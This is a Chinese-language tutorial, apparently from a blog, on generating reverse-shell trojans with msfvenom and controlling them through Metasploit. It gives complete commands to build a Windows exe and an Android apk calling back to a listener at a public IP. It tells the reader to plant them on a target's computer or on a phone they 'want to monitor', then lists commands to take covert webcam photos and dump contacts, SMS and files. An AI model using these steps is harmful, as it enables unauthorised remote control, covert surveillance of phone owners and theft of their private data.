简介
msfvenom
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件
查看所有--payload的模块
msfvenom -l payloads
文件后缀名-f的格式
msfvenom --help-formats
metasploit
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
生成的木马是前端的话,那么这个就是后端
msfvenom的shell在windows中的使用
msfvenom生成shell.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=222.222.221.140 lport=1211 -f exe > /root/shell.exe
启动metasploit
输入命令:
msfconsole
metasploit侦听
msf > use exploit/multi/handler #加载模块 msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #设置payload payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost kali的ip #设置kali的ip lhost => 192.168.152.131 msf exploit(multi/handler) > set lport 1211 #设置kali的端口 lport => 1211 msf exploit(multi/handler) > exploit #执行 [*] Started reverse TCP handler on 222.222.221.140:1211
将生成的shell上传至windows主机中并运行
提示有返回即可控制对方电脑,如同操作linux服务器一样
使用
? - 帮助菜单
download -下载文件/文件夹
msfvenom的apk在android中的使用
msfvenom生成shell.apk
ifconfig查看kali的ip,ip为222.222.221.140
输入命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多大小
启动metasploit
输入命令:
msfconsole
启动msfconsole
metasploit配置及监听
在控制台中输入
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
show options //查看参数设置
这里需要设置LHOST的ip地址,也就是你的kali的ip地址
还有LPORT端口,刚才设置的为5555,也需要更改一下(刚才直接设置为4444也是可以的)
set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的IP地址(kali的ip)
set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口
exploit //开始执行漏洞 开始监听,等待手机上线
接下来就要把生成的apk装在你想监控的手机上了,等待手机上线了
使用
然后可以输入sysinfo 查看手机信息
webcam_list 查看手机有多少个摄像头 这里显示是2个
webcam_stream //开启摄像头
webcam_snap //隐秘拍照功能
dump_contacts //导出电话号码
dump_sms //导出信息
导出的文件拍的照片都会在root下面
可以输入?查看更多命令
session切换
background #后台运行当前session sessions #列出所有session sessions -i Id #选择某一个sessionID进入session sessions -n Name -i Id #给session重命名
参考:https://blog.csdn.net/langtuteng17/article/details/80444115